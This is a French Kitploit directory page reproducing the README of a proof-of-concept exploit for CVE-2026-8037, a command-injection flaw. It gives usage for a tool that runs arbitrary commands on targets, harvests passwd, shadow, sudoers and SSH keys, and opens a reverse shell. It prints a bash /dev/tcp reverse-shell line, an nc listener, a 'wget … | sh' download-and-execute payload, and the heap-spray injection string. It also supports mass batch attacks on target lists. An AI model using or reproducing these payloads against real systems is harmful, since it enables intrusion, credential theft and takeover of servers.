Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-8037-POC — Comprend la détection de commandes exécutables et un getshell en un clic (nécessite le déploiement d'un service sur le serveur) | Kitploit
Outils/GitHubGitHub/caster-chen/cve-2026-8037-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

Comprend la détection de commandes exécutables et un getshell en un clic (nécessite le déploiement d'un service sur le serveur)

Voir le dépôt
9il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-8037-POC

Inclut la détection des commandes exécutables et un one-click getShell (nécessite un service déployé sur le serveur) pco.yaml peut être utilisé avec nuclei pour une détection rapide

Démarrage rapide

Mode interactif

python go.py

Entrez l'URL cible → sélectionnez la fonction dans le menu.

Détection de cible

# Détection rapide (8 informations de base)
python go.py -t https://IP:PORT --probe fast

# Détection profonde (toutes les commandes : 30+ éléments)
python go.py -t https://IP:PORT --probe deep

# Détection par lot
python go.py -f vulnerable_targets.txt --probe fast

Exécution de commande

python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# Par lot en concurrence (20 threads)
python go.py -f targets.txt -c "hostname" --batch 20

Reverse Shell en un clic

Ouvrez deux terminaux sur la machine d'attaque :

# Terminal 1 - Service HTTP (fournit rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# Terminal 2 - Attente du reverse
nc -lvnp 8088

Puis envoyez le payload :

# Cible unique
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# Par lot (série, un seul à la fois)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

Le script imprime les étapes de préparation avant d'envoyer.


Contenu de la détection approfondie

CatégorieCommande
Informations de basehostname, uname -a, kernel, OS release, uptime
Utilisateursid, whoami, users/w/who
Réseauifconfig, route, arp, listening ports, connections, iptables
Systèmeprocesses, cpuinfo, meminfo, disk, mount
Fichiersls / /root /tmp /home /etc
Configurationcrontab, passwd, shadow, sudoers, SSH keys
Extensionconfig search, scripts, docker, containers

Principe d'injection

{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'; <commande> #", ...}
  • apiuser="''''" déclenche le défaut de non-null-termination de escape_quotes()
  • g0~g60 heap spray 61 fois, augmente le taux de réussite
  • '; <commande> # ferme le contexte, # commente la suite

Limite de longueur

Sans echo tag, 34 caractères disponibles :

wget -O- IP:PORT|sh    (31 caractères)

Chaîne de pipe : wget télécharge → sh exécute → bash reverse vers le port spécifié.


Aperçu des paramètres

ParamètreRôle
-t, --target URLAdresse cible
-f, --file FILEFichier de liste de cibles
-l, --lhost IPIP de la machine d'attaque
-p, --lport PORTPort du service HTTP (défaut 8087)
-n, --ncport PORTPort d'écoute nc (défaut 8088)
-c, --cmd CMDCommande à exécuter
--probe fast/deepDétection rapide/profonde
--batch NNombre de cibles concurrentes (défaut série)
Télécharger l’outil